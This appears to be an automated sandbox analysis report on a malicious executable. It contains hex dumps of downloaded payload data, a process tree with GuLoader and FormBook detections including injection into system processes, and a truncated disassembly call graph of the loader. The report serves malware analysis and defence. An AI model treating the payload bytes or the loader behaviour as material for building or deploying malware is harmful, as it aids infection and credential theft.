                                                        2024-10-04 15:25:18 UTC1255INData Raw: dc a0 1b a8 6d 67 c9 0d ab 2b ce 6b 53 00 49 d9 1c ba 1f ae 69 d9 ba 74 0f 05 9d 97 68 d0 93 9e 69 2e 17 39 fd d4 c4 d8 9b f4 ec 62 55 97 e1 90 6b bf bb 3b 75 1e 49 8a 49 f0 b4 7a b1 25 d2 ad 1a 93 2b 02 a9 c3 90 64 5f 3d a0 11 4f 8a 2b 69 87 24 3a 45 14 4b 7a 2d 73 fa 3a 8b 76 dc 8e be d7 74 8e f4 c5 69 d7 5e 5e 0e d9 35 13 36 c8 b5 8b 0a 52 de 5a 02 19 71 a1 9c 52 ab ee a0 94 74 b7 31 88 89 0c 75 43 24 69 72 d7 e4 e8 36 f0 9b 32 21 1d 13 e6 68 55 68 ff 6c 89 c0 9e b2 e7 ed da 67 c4 f9 69 15 30 54 4b 93 cd 90 16 e7 40 3d 3e 71 e8 f3 e7 fd eb e7 cd 67 6b 1e b7 1b c2 8b bc 32 46 9e 4c e0 0e 3c 35 0b be 50 cd 34 6c 89 8e 69 d4 02 99 89 32 9f 5d be ef b6 15 0f 7a 7a f2 1f 52 51 9f 3d 66 29 5f 61 86 75 1c 1a df 49 89 2c 03 ea 69 2d 41 98 20 e5 a2 1c 96 2f db
                                                        Data Ascii: mg+kSIithi.9bUk;uIIz%+d_=O+i$:EKz-s:vti^^56RZqRt1uC$ir62!hUhlgi0TK@=>qgk2FL<5P4li2]zzRQ=f)_auI,i-A /
                                                        2024-10-04 15:25:18 UTC1255INData Raw: e7 aa 41 b6 86 9a 3b 0f 8a d8 03 14 60 b2 b8 5e 9e 7c 13 cc 0b 78 03 aa cd 16 7a e1 04 8c 2b 74 b3 86 2a dd 54 85 1a 30 fc 34 74 56 29 40 22 f6 88 7f 3c c3 f3 0f 92 e3 58 cc f5 5d 77 3b d9 a0 97 74 19 47 a1 44 b7 ec 19 e9 1b e9 41 b6 0a c1 b6 50 66 b6 ae a3 fa 8e e0 e3 26 99 33 fe 37 fe 03 e4 9d e5 ed 6c b2 3e 8c 29 83 23 a5 9f 75 f0 15 8d 7c 31 38 0a 16 c6 84 be bc ec e4 73 44 bc dc 50 48 ee dd 6b e3 42 61 63 3b ea bd 4e 47 8a e0 fa 6a af 97 b7 67 1f a2 f2 73 e8 58 9a 12 83 67 23 d9 52 a9 28 c9 52 2f 21 a2 b2 8b e3 70 d1 23 5a 39 dc 7a a8 f7 c3 19 0f c1 cb 10 56 2c 52 de d1 20 53 25 08 21 94 3b 94 59 3a 4b 5f 95 69 87 37 9a 80 f9 d5 57 43 90 58 e9 1e c5 31 79 59 1e 46 fd 7f f8 e1 2c 13 e2 fc 79 4b 12 0e f8 79 e4 38 f9 bb 62 b8 5e 9f 30 34 43 90 da 5c b5
                                                        Data Ascii: A;`^|xz+t*T04tV)@"<X]w;tGDAPf&37l>)#u|18sDPHkBac;NGjgsXg#R(R/!p#Z9zV,R S%!;Y:K_i7WCX1yYF,yKy8b^04C\
                                                        2024-10-04 15:25:18 UTC1255INData Raw: 23 f6 01 21 e9 58 5b 59 5f 15 39 75 e6 41 7c ba ab bc d1 74 f8 38 ca 8e 6f 1a 8d d5 9e a4 e5 86 fe cc 1e 81 b3 af a1 82 7f b0 e6 d6 f0 4c 66 ce ff fd 4a 64 7e da cf c0 49 8d 6a fe 73 60 0d fd cd 3e c9 f2 36 72 e4 32 51 7c 80 02 5f 8a 10 e6 24 7f 41 70 ad fb d2 11 db 2b fc b6 03 20 f1 2f 2a 74 85 dc d0 c9 1f e8 0a ec 53 78 1a 6e 37 a6 41 b9 03 97 0e 16 db 98 f2 74 9b 73 44 b6 b9 82 d1 54 27 eb 64 b8 e7 22 a1 73 f1 75 82 d4 47 75 d9 69 af 33 b4 1b c1 dd 1f 5d 33 5d f2 02 e2 00 86 6d 7d ad a5 d0 88 94 49 a3 70 7b 28 e6 31 d6 28 d1 71 5b 51 2d 2a 97 f9 7c 8f 7b 83 f1 86 d5 44 78 e0 cd 0e 1d c5 ef b0 13 10 7e 8a 74 4a aa 0a 1e 87 bb 13 cd fe 9e 1b 12 da 5e 4f 44 3a ac 98 3e 9e 5c 1a 08 a3 29 e2 d3 5e 80 39 eb 1d 77 e4 6f 02 a7 4c f1 a1 15 c1 71 6c 2c 2e 85 3e
                                                        Data Ascii: #!X[Y_9uA|t8oLfJd~Ijs`>6r2Q|_$Ap+ /*tSxn7AtsDT'd"suGui3]3]m}Ip{(1(q[Q-*|{Dx~tJ^OD:>\)^9woLql,.>
                                                        2024-10-04 15:25:18 UTC1255INData Raw: fa 81 e0 97 bc f3 84 8c b4 9a f9 22 59 9b 70 f0 86 d6 9e c3 d1 69 fb 7c fa 24 30 8a 59 02 c8 b0 5a 29 00 39 45 9e 58 f5 16 17 26 5a 5f 43 76 7a b1 d5 06 71 77 54 4c cd 61 0c 4a f2 51 a6 5a 94 ef 1d ac e7 76 57 4c 88 e0 a4 06 e1 67 95 fd 31 9f 99 bd 3f 5b d3 0d e0 71 d3 c1 cb 5c 7c 49 5f cb a8 34 94 d6 35 d8 0e 56 3c 42 48 93 f6 57 9a a0 84 1c d3 7f dc 3b 8d 27 41 c4 e3 7c 4c 8e 0f 48 a3 d0 f0 ad 30 85 71 19 c2 b2 29 89 8a db 6a 5c 34 c1 1f ad 99 a4 44 3a 55 83 9c de 98 e1 82 d0 70 53 ab 2b c4 10 87 61 b6 f3 39 4a ea a8 17 0a 01 a5 31 51 07 fd 1e 32 cb 44 d4 40 85 71 31 66 fb 1d 8e a8 5c 1d 90 3c 1f 20 ed 1b f7 16 0e 2b 9e 94 d4 04 8c f6 67 53 0c c8 32 1d bb d9 5b f2 d8 27 4d 49 2d c2 10 03 11 82 4c 5a 8f 84 89 2d b1 ba d5 19 8b b5 9d 59 5a 4f c7 ce ee 15
                                                        Data Ascii: "Ypi|$0YZ)9EX&Z_CvzqwTLaJQZvWLg1?[q\|I_45V<BHW;'A|LH0q)j\4D:UpS+a9J1Q2D@q1f\< +gS2['MI-LZ-YZO
                                                        2024-10-04 15:25:18 UTC1255INData Raw: 7d 95 d8 d1 e0 c2 e8 98 3d 3d 08 a1 4f be 14 0e 2c 65 a9 8f 91 ae 74 db 7c 0d bc 26 da ac 99 9d 98 34 fd 97 53 53 3d c8 70 b5 de 44 ff 6a 7b a1 f8 d0 2a bf 17 24 7b 91 40 d4 a6 36 4f 64 b7 04 60 f7 b8 45 8a f3 fc e6 31 cd 9f 8e 23 49 2e 89 32 db 86 ef b3 b7 f6 b6 27 6c 49 96 ca 8f 21 18 8e 19 11 3a b9 5f 76 ca d7 f6 1c 1e 19 19 7f 64 9b 41 cb 14 10 58 7d 23 d0 f4 ef d6 11 36 65 62 af 17 6e 10 57 c2 ca 56 ba bf ee 95 51 4c ce 03 7e fa 08 f3 b5 66 bf 88 14 8c 67 b7 83 65 0d cc f0 e2 d3 ad da 2e 1f 14 58 1c 17 5c d5 88 d8 6c 70 b2 59 76 93 2c d5 98 ad 66 2f 4d 17 7e ae d1 48 63 d5 0c f6 31 9a 60 94 f5 f8 67 4f 18 6e b0 46 0a 13 0e a5 8c bf db b9 ac 9c dd 25 33 d5 96 34 b3 7f 40 5e 99 8e 9c 85 f5 dd f5 4c 64 48 5f 72 66 0e 19 e5 ee 2d 77 59 11 56 ec 2f 2b b4
                                                        Data Ascii: }==O,et|&4SS=pDj{*${@6Od`E1#I.2'lI!:_vdAX}#6ebnWVQL~fge.X\lpYv,f/M~Hc1`gOnF%34@^LdH_rf-wYV/+


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:11:23:39
                                                        Start date:04/10/2024
                                                        Path:C:\Users\user\Desktop\rpedido-00035.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\rpedido-00035.exe"
                                                        Imagebase:0x400000
                                                        File size:577'872 bytes
                                                        MD5 hash:13DE5FEFD3DDA5E310CDE2FA1E6D4B32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.44559719436.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.44560230071.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.44560230071.0000000003D19000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:11:25:04
                                                        Start date:04/10/2024
                                                        Path:C:\Users\user\Desktop\rpedido-00035.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\rpedido-00035.exe"
                                                        Imagebase:0x400000
                                                        File size:577'872 bytes
                                                        MD5 hash:13DE5FEFD3DDA5E310CDE2FA1E6D4B32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.44867701457.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.44867701457.0000000002159000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:11:25:42
                                                        Start date:04/10/2024
                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                        Imagebase:0x140000000
                                                        File size:16'696'840 bytes
                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:11:25:43
                                                        Start date:04/10/2024
                                                        Path:C:\Windows\SysWOW64\sethc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\sethc.exe"
                                                        Imagebase:0x2e0000
                                                        File size:81'920 bytes
                                                        MD5 hash:AA9A6E4DADA121001CFDF184B9758BBE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:11:28:16
                                                        Start date:04/10/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6c8c90000
                                                        File size:4'849'904 bytes
                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:17.3%
                                                          Dynamic/Decrypted Code Coverage:13.2%
                                                          Signature Coverage:19.7%
                                                          Total number of Nodes:1590
                                                          Total number of Limit Nodes:37
                                                          execution_graph 5086 10001000 5089 1000101b 5086->5089 5096 10001516 5089->5096 5091 10001020 5092 10001024 5091->5092 5093 10001027 GlobalAlloc 5091->5093 5094 1000153d 3 API calls 5092->5094 5093->5092 5095 10001019 5094->5095 5098 1000151c 5096->5098 5097 10001522 5097->5091 5098->5097 5099 1000152e GlobalFree 5098->5099 5099->5091 4198 401941 4199 401943 4198->4199 4200 402c37 17 API calls 4199->4200 4201 401948 4200->4201 4204 405abe 4201->4204 4243 405d89 4204->4243 4207 405ae6 DeleteFileW 4209 401951 4207->4209 4208 405afd 4211 405c28 4208->4211 4257 4063b0 lstrcpynW 4208->4257 4211->4209 4275 4066f3 FindFirstFileW 4211->4275 4212 405b23 4213 405b36 4212->4213 4214 405b29 lstrcatW 4212->4214 4258 405ccd lstrlenW 4213->4258 4215 405b3c 4214->4215 4218 405b4c lstrcatW 4215->4218 4220 405b57 lstrlenW FindFirstFileW 4215->4220 4218->4220 4222 405c1d 4220->4222 4241 405b79 4220->4241 4221 405c46 4278 405c81 lstrlenW CharPrevW 4221->4278 4222->4211 4225 405c00 FindNextFileW 4228 405c16 FindClose 4225->4228 4225->4241 4226 405a76 5 API calls 4229 405c58 4226->4229 4228->4222 4230 405c72 4229->4230 4231 405c5c 4229->4231 4233 405414 24 API calls 4230->4233 4231->4209 4234 405414 24 API calls 4231->4234 4233->4209 4236 405c69 4234->4236 4235 405abe 60 API calls 4235->4241 4237 406176 36 API calls 4236->4237 4239 405c70 4237->4239 4238 405414 24 API calls 4238->4225 4239->4209 4240 405414 24 API calls 4240->4241 4241->4225 4241->4235 4241->4238 4241->4240 4262 4063b0 lstrcpynW 4241->4262 4263 405a76 4241->4263 4271 406176 MoveFileExW 4241->4271 4281 4063b0 lstrcpynW 4243->4281 4245 405d9a 4282 405d2c CharNextW CharNextW 4245->4282 4248 405ade 4248->4207 4248->4208 4249 406644 5 API calls 4254 405db0 4249->4254 4250 405de1 lstrlenW 4251 405dec 4250->4251 4250->4254 4253 405c81 3 API calls 4251->4253 4252 4066f3 2 API calls 4252->4254 4255 405df1 GetFileAttributesW 4253->4255 4254->4248 4254->4250 4254->4252 4256 405ccd 2 API calls 4254->4256 4255->4248 4256->4250 4257->4212 4259 405cdb 4258->4259 4260 405ce1 CharPrevW 4259->4260 4261 405ced 4259->4261 4260->4259 4260->4261 4261->4215 4262->4241 4288 405e7d GetFileAttributesW 4263->4288 4266 405aa3 4266->4241 4267 405a91 RemoveDirectoryW 4269 405a9f 4267->4269 4268 405a99 DeleteFileW 4268->4269 4269->4266 4270 405aaf SetFileAttributesW 4269->4270 4270->4266 4272 406197 4271->4272 4273 40618a 4271->4273 4272->4241 4291 405ffc 4273->4291 4276 405c42 4275->4276 4277 406709 FindClose 4275->4277 4276->4209 4276->4221 4277->4276 4279 405c4c 4278->4279 4280 405c9d lstrcatW 4278->4280 4279->4226 4280->4279 4281->4245 4283 405d49 4282->4283 4286 405d5b 4282->4286 4285 405d56 CharNextW 4283->4285 4283->4286 4284 405d7f 4284->4248 4284->4249 4285->4284 4286->4284 4287 405cae CharNextW 4286->4287 4287->4286 4289 405a82 4288->4289 4290 405e8f SetFileAttributesW 4288->4290 4289->4266 4289->4267 4289->4268 4290->4289 4292 406052 GetShortPathNameW 4291->4292 4293 40602c 4291->4293 4294 406171 4292->4294 4295 406067 4292->4295 4318 405ea2 GetFileAttributesW CreateFileW 4293->4318 4294->4272 4295->4294 4297 40606f wsprintfA 4295->4297 4299 4063d2 17 API calls 4297->4299 4298 406036 CloseHandle GetShortPathNameW 4298->4294 4300 40604a 4298->4300 4301 406097 4299->4301 4300->4292 4300->4294 4319 405ea2 GetFileAttributesW CreateFileW 4301->4319 4303 4060a4 4303->4294 4304 4060b3 GetFileSize GlobalAlloc 4303->4304 4305 4060d5 4304->4305 4306 40616a CloseHandle 4304->4306 4320 405f25 ReadFile 4305->4320 4306->4294 4311 4060f4 lstrcpyA 4314 406116 4311->4314 4312 406108 4313 405e07 4 API calls 4312->4313 4313->4314 4315 40614d SetFilePointer 4314->4315 4327 405f54 WriteFile 4315->4327 4318->4298 4319->4303 4321 405f43 4320->4321 4321->4306 4322 405e07 lstrlenA 4321->4322 4323 405e48 lstrlenA 4322->4323 4324 405e50 4323->4324 4325 405e21 lstrcmpiA 4323->4325 4324->4311 4324->4312 4325->4324 4326 405e3f CharNextA 4325->4326 4326->4323 4328 405f72 GlobalFree 4327->4328 4328->4306 4329 4015c1 4330 402c37 17 API calls 4329->4330 4331 4015c8 4330->4331 4332 405d2c 4 API calls 4331->4332 4344 4015d1 4332->4344 4333 401631 4335 401663 4333->4335 4336 401636 4333->4336 4334 405cae CharNextW 4334->4344 4339 401423 24 API calls 4335->4339 4356 401423 4336->4356 4346 40165b 4339->4346 4343 40164a SetCurrentDirectoryW 4343->4346 4344->4333 4344->4334 4345 401617 GetFileAttributesW 4344->4345 4348 40597d 4344->4348 4351 4058e3 CreateDirectoryW 4344->4351 4360 405960 CreateDirectoryW 4344->4360 4345->4344 4363 40678a GetModuleHandleA 4348->4363 4352 405930 4351->4352 4353 405934 GetLastError 4351->4353 4352->4344 4353->4352 4354 405943 SetFileSecurityW 4353->4354 4354->4352 4355 405959 GetLastError 4354->4355 4355->4352 4357 405414 24 API calls 4356->4357 4358 401431 4357->4358 4359 4063b0 lstrcpynW 4358->4359 4359->4343 4361 405970 4360->4361 4362 405974 GetLastError 4360->4362 4361->4344 4362->4361 4364 4067b0 GetProcAddress 4363->4364 4365 4067a6 4363->4365 4367 405984 4364->4367 4369 40671a GetSystemDirectoryW 4365->4369 4367->4344 4368 4067ac 4368->4364 4368->4367 4370 40673c wsprintfW LoadLibraryExW 4369->4370 4370->4368 4375 401e43 4383 402c15 4375->4383 4377 401e49 4378 402c15 17 API calls 4377->4378 4379 401e55 4378->4379 4380 401e61 ShowWindow 4379->4380 4381 401e6c EnableWindow 4379->4381 4382 402abf 4380->4382 4381->4382 4384 4063d2 17 API calls 4383->4384 4385 402c2a 4384->4385 4385->4377 4390 402644 4391 402c15 17 API calls 4390->4391 4400 402653 4391->4400 4392 402790 4393 40269d ReadFile 4393->4392 4393->4400 4394 402736 4394->4392 4394->4400 4404 405f83 SetFilePointer 4394->4404 4395 405f25 ReadFile 4395->4400 4397 402792 4413 4062f7 wsprintfW 4397->4413 4398 4026dd MultiByteToWideChar 4398->4400 4400->4392 4400->4393 4400->4394 4400->4395 4400->4397 4400->4398 4401 402703 SetFilePointer MultiByteToWideChar 4400->4401 4402 4027a3 4400->4402 4401->4400 4402->4392 4403 4027c4 SetFilePointer 4402->4403 4403->4392 4405 405f9f 4404->4405 4412 405fbb 4404->4412 4406 405f25 ReadFile 4405->4406 4407 405fab 4406->4407 4408 405fc4 SetFilePointer 4407->4408 4409 405fec SetFilePointer 4407->4409 4407->4412 4408->4409 4410 405fcf 4408->4410 4409->4412 4411 405f54 WriteFile 4410->4411 4411->4412 4412->4394 4413->4392 5107 402348 5108 402c37 17 API calls 5107->5108 5109 402357 5108->5109 5110 402c37 17 API calls 5109->5110 5111 402360 5110->5111 5112 402c37 17 API calls 5111->5112 5113 40236a GetPrivateProfileStringW 5112->5113 5117 4016cc 5118 402c37 17 API calls 5117->5118 5119 4016d2 GetFullPathNameW 5118->5119 5120 4016ec 5119->5120 5126 40170e 5119->5126 5122 4066f3 2 API calls 5120->5122 5120->5126 5121 401723 GetShortPathNameW 5123 402abf 5121->5123 5124 4016fe 5122->5124 5124->5126 5127 4063b0 lstrcpynW 5124->5127 5126->5121 5126->5123 5127->5126 5128 401b4d 5129 402c37 17 API calls 5128->5129 5130 401b54 5129->5130 5131 402c15 17 API calls 5130->5131 5132 401b5d wsprintfW 5131->5132 5133 402abf 5132->5133 5134 4047cd 5135 404803 5134->5135 5136 4047dd 5134->5136 5144 4043ac 5135->5144 5141 404345 5136->5141 5140 4047ea SetDlgItemTextW 5140->5135 5142 4063d2 17 API calls 5141->5142 5143 404350 SetDlgItemTextW 5142->5143 5143->5140 5145 4043c4 GetWindowLongW 5144->5145 5155 40444d 5144->5155 5146 4043d5 5145->5146 5145->5155 5147 4043e4 GetSysColor 5146->5147 5148 4043e7 5146->5148 5147->5148 5149 4043f7 SetBkMode 5148->5149 5150 4043ed SetTextColor 5148->5150 5151 404415 5149->5151 5152 40440f GetSysColor 5149->5152 5150->5149 5153 404426 5151->5153 5154 40441c SetBkColor 5151->5154 5152->5151 5153->5155 5156 404440 CreateBrushIndirect 5153->5156 5157 404439 DeleteObject 5153->5157 5154->5153 5156->5155 5157->5156 5158 401f52 5159 402c37 17 API calls 5158->5159 5160 401f59 5159->5160 5161 4066f3 2 API calls 5160->5161 5162 401f5f 5161->5162 5164 401f70 5162->5164 5165 4062f7 wsprintfW 5162->5165 5165->5164 5166 402253 5167 402c37 17 API calls 5166->5167 5168 402259 5167->5168 5169 402c37 17 API calls 5168->5169 5170 402262 5169->5170 5171 402c37 17 API calls 5170->5171 5172 40226b 5171->5172 5173 4066f3 2 API calls 5172->5173 5174 402274 5173->5174 5175 402285 lstrlenW lstrlenW 5174->5175 5176 402278 5174->5176 5178 405414 24 API calls 5175->5178 5177 405414 24 API calls 5176->5177 5180 402280 5177->5180 5179 4022c3 SHFileOperationW 5178->5179 5179->5176 5179->5180 5181 405553 5182 405574 GetDlgItem GetDlgItem GetDlgItem 5181->5182 5183 4056fd 5181->5183 5226 40437a SendMessageW 5182->5226 5185 405706 GetDlgItem CreateThread CloseHandle 5183->5185 5186 40572e 5183->5186 5185->5186 5188 405759 5186->5188 5189 405745 ShowWindow ShowWindow 5186->5189 5190 40577e 5186->5190 5187 4055e4 5192 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 5187->5192 5191 4057b9 5188->5191 5194 405793 ShowWindow 5188->5194 5195 40576d 5188->5195 5228 40437a SendMessageW 5189->5228 5196 4043ac 8 API calls 5190->5196 5191->5190 5201 4057c7 SendMessageW 5191->5201 5199 405659 5192->5199 5200 40563d SendMessageW SendMessageW 5192->5200 5197 4057b3 5194->5197 5198 4057a5 5194->5198 5229 40431e 5195->5229 5203 40578c 5196->5203 5205 40431e SendMessageW 5197->5205 5204 405414 24 API calls 5198->5204 5206 40566c 5199->5206 5207 40565e SendMessageW 5199->5207 5200->5199 5201->5203 5208 4057e0 CreatePopupMenu 5201->5208 5204->5197 5205->5191 5210 404345 18 API calls 5206->5210 5207->5206 5209 4063d2 17 API calls 5208->5209 5211 4057f0 AppendMenuW 5209->5211 5212 40567c 5210->5212 5213 405820 TrackPopupMenu 5211->5213 5214 40580d GetWindowRect 5211->5214 5215 405685 ShowWindow 5212->5215 5216 4056b9 GetDlgItem SendMessageW 5212->5216 5213->5203 5218 40583b 5213->5218 5214->5213 5219 4056a8 5215->5219 5220 40569b ShowWindow 5215->5220 5216->5203 5217 4056e0 SendMessageW SendMessageW 5216->5217 5217->5203 5221 405857 SendMessageW 5218->5221 5227 40437a SendMessageW 5219->5227 5220->5219 5221->5221 5222 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5221->5222 5224 405899 SendMessageW 5222->5224 5224->5224 5225 4058c2 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5203 5226->5187 5227->5216 5228->5188 5230 404325 5229->5230 5231 40432b SendMessageW 5229->5231 5230->5231 5231->5190 5232 401956 5233 402c37 17 API calls 5232->5233 5234 40195d lstrlenW 5233->5234 5235 40258c 5234->5235 5038 4014d7 5039 402c15 17 API calls 5038->5039 5040 4014dd Sleep 5039->5040 5042 402abf 5040->5042 5236 401d57 GetDlgItem GetClientRect 5237 402c37 17 API calls 5236->5237 5238 401d89 LoadImageW SendMessageW 5237->5238 5239 401da7 DeleteObject 5238->5239 5240 402abf 5238->5240 5239->5240 5241 4022d7 5242 4022f1 5241->5242 5243 4022de 5241->5243 5244 4063d2 17 API calls 5243->5244 5245 4022eb 5244->5245 5246 405a12 MessageBoxIndirectW 5245->5246 5246->5242 5247 402dd7 5248 402e02 5247->5248 5249 402de9 SetTimer 5247->5249 5250 402e50 5248->5250 5251 402e56 MulDiv 5248->5251 5249->5248 5252 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 5254 404459 lstrcpynW lstrlenW 5043 40175c 5044 402c37 17 API calls 5043->5044 5045 401763 5044->5045 5046 405ed1 2 API calls 5045->5046 5047 40176a 5046->5047 5048 405ed1 2 API calls 5047->5048 5048->5047 5061 4023de 5062 402c37 17 API calls 5061->5062 5063 4023f0 5062->5063 5064 402c37 17 API calls 5063->5064 5065 4023fa 5064->5065 5078 402cc7 5065->5078 5068 402432 5071 402c15 17 API calls 5068->5071 5073 40243e 5068->5073 5069 402885 5070 402c37 17 API calls 5074 402428 lstrlenW 5070->5074 5071->5073 5072 40245d RegSetValueExW 5076 402473 RegCloseKey 5072->5076 5073->5072 5075 4031ba 44 API calls 5073->5075 5074->5068 5075->5072 5076->5069 5079 402ce2 5078->5079 5082 40624b 5079->5082 5083 40625a 5082->5083 5084 40240a 5083->5084 5085 406265 RegCreateKeyExW 5083->5085 5084->5068 5084->5069 5084->5070 5085->5084 5262 402862 5263 402c37 17 API calls 5262->5263 5264 402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5269 40287c 5264->5269 5270 4062f7 wsprintfW 5265->5270 5267 40289a 5271 4063b0 lstrcpynW 5267->5271 5270->5267 5271->5269 5272 4044e2 5273 4044fa 5272->5273 5280 404614 5272->5280 5277 404345 18 API calls 5273->5277 5274 40467e 5275 404748 5274->5275 5276 404688 GetDlgItem 5274->5276 5282 4043ac 8 API calls 5275->5282 5278 4046a2 5276->5278 5279 404709 5276->5279 5281 404561 5277->5281 5278->5279 5286 4046c8 SendMessageW LoadCursorW SetCursor 5278->5286 5279->5275 5287 40471b 5279->5287 5280->5274 5280->5275 5283 40464f GetDlgItem SendMessageW 5280->5283 5285 404345 18 API calls 5281->5285 5296 404743 5282->5296 5305 404367 EnableWindow 5283->5305 5289 40456e CheckDlgButton 5285->5289 5309 404791 5286->5309 5291 404731 5287->5291 5292 404721 SendMessageW 5287->5292 5288 404679 5306 40476d 5288->5306 5303 404367 EnableWindow 5289->5303 5291->5296 5297 404737 SendMessageW 5291->5297 5292->5291 5297->5296 5298 40458c GetDlgItem 5304 40437a SendMessageW 5298->5304 5300 4045a2 SendMessageW 5301 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5300->5301 5302 4045bf GetSysColor 5300->5302 5301->5296 5302->5301 5303->5298 5304->5300 5305->5288 5307 404780 SendMessageW 5306->5307 5308 40477b 5306->5308 5307->5274 5308->5307 5312 4059d8 ShellExecuteExW 5309->5312 5311 4046f7 LoadCursorW SetCursor 5311->5279 5312->5311 5313 401563 5314 402a65 5313->5314 5317 4062f7 wsprintfW 5314->5317 5316 402a6a 5317->5316 5318 401968 5319 402c15 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402c15 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402c37 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5325 4019a4 5324->5325 5326 4019e5 5325->5326 5330 4063b0 lstrcpynW 5325->5330 5328 4019d5 5328->5326 5329 4019da lstrlenW 5328->5329 5329->5326 5330->5328 4458 4027e9 4459 4027f0 4458->4459 4461 402a6a 4458->4461 4460 402c15 17 API calls 4459->4460 4462 4027f7 4460->4462 4463 402806 SetFilePointer 4462->4463 4463->4461 4464 402816 4463->4464 4466 4062f7 wsprintfW 4464->4466 4466->4461 5331 100018a9 5333 100018cc 5331->5333 5332 10001911 5335 10001272 2 API calls 5332->5335 5333->5332 5334 100018ff GlobalFree 5333->5334 5334->5332 5336 10001a87 GlobalFree GlobalFree 5335->5336 5337 40166a 5338 402c37 17 API calls 5337->5338 5339 401670 5338->5339 5340 4066f3 2 API calls 5339->5340 5341 401676 5340->5341 5342 404b6a 5343 404b96 5342->5343 5344 404b7a 5342->5344 5346 404bc9 5343->5346 5347 404b9c SHGetPathFromIDListW 5343->5347 5353 4059f6 GetDlgItemTextW 5344->5353 5349 404bac 5347->5349 5352 404bb3 SendMessageW 5347->5352 5348 404b87 SendMessageW 5348->5343 5351 40140b 2 API calls 5349->5351 5351->5352 5352->5346 5353->5348 5354 403e6c 5355 403e84 5354->5355 5356 403fbf 5354->5356 5355->5356 5357 403e90 5355->5357 5358 403fd0 GetDlgItem GetDlgItem 5356->5358 5359 404010 5356->5359 5360 403e9b SetWindowPos 5357->5360 5361 403eae 5357->5361 5362 404345 18 API calls 5358->5362 5363 40406a 5359->5363 5371 401389 2 API calls 5359->5371 5360->5361 5365 403eb3 ShowWindow 5361->5365 5366 403ecb 5361->5366 5367 403ffa SetClassLongW 5362->5367 5364 404391 SendMessageW 5363->5364 5384 403fba 5363->5384 5381 40407c 5364->5381 5365->5366 5368 403ed3 DestroyWindow 5366->5368 5369 403eed 5366->5369 5370 40140b 2 API calls 5367->5370 5422 4042ce 5368->5422 5372 403ef2 SetWindowLongW 